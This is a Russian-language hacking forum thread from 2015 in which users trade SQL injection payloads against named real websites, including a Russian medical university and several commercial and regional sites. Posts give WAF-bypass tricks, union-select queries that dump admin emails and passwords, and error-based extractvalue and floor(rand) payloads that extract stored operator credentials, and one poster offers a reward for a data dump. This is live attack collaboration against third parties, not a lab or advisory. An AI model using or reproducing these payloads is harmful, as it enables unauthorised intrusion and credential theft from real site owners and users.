15.01.2015, 12:29
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Как обойти сей WAF?
Код:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,3+--+
True
Код:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,user()+--+
False |
|
|
15.01.2015, 12:45
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от MaxFast
Как обойти сей WAF?
Код:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,3+--+
True
Код:
http://ngmu.ru/common.php?page_services§ion=-B'+union+select+1,2,user()+--+
False WAF срабатывает на скобки:
true
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,@@version+--+
false
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,@@version+--+()
а вот собственно и таблички:
Сообщение от None
http://ngmu.ru/common.php?page_services§ion=-B%27+union+select+1,2,table_name+from+information_ schema.tables+limit+0,1+--+
и да, обрати внимание, что это " НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"
|
|
|
|
15.01.2015, 12:48
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64?
Хотя для char и base64 тоже нужны скобки.
|
|
|
|
15.01.2015, 15:47
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
urlencode, double urlencode, utf encode
|
|
|
|
16.01.2015, 15:25
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Помогите со слепой скулей. скриптик написать или сдампить нужные данные.
https://www.ckbproducts.com/ship_estimator.php?action=process
POST
Сообщение от None
shipzone=ghffgjfgj&shippostcode=67966&shipcountry= 19'{SQL}
сдампить нужно
Сообщение от None
union+select+concat_ws(':',admin_id,admin_email_ad dress,admin_password)+from+admin+--+
если нужно вознаграждение - в пм или жабу) |
|
|
|
16.01.2015, 23:36
|
|
Новичок
Регистрация: 19.01.2014
Сообщений: 17
С нами:
6481046
Репутация:
0
|
|
На сайте есть файл crossdomain.xml с таким содержимым:
Как это можно использовать? |
|
|
|
17.01.2015, 11:09
|
|
Новичок
Регистрация: 20.03.2014
Сообщений: 5
С нами:
6394646
Репутация:
0
|
|
Blind
Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.
|
|
|
|
18.01.2015, 15:18
|
|
Новичок
Регистрация: 01.09.2012
Сообщений: 28
С нами:
7208246
Репутация:
0
|
|
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&re gion=2&sessionlogin=1%27
помогите раскрутить
|
|
|
|
18.01.2015, 15:35
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от nike001
На сайте есть файл crossdomain.xml с таким содержимым:
Как это можно использовать? http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html
Сообщение от lion_art
Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28col umn_name%29from%28information_schema.columns%29whe re%60table_name%60=information_schema%20and%28ordi nal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь.
что именно не получается? составьте корректный запрос и все нормально
Сообщение от reuvenmatbil
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&re gion=2&sessionlogin=1%27
помогите раскрутить
Код:
http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4®ion=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2)))='1
|
|
|
|
18.01.2015, 16:03
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от noviks
помогите раскрутить http:// www.paid2earn.de/img/media.php?art=1'' MySQL error based
вот пример как вот здесь,почему не выводится,таким запросом
5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle. betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
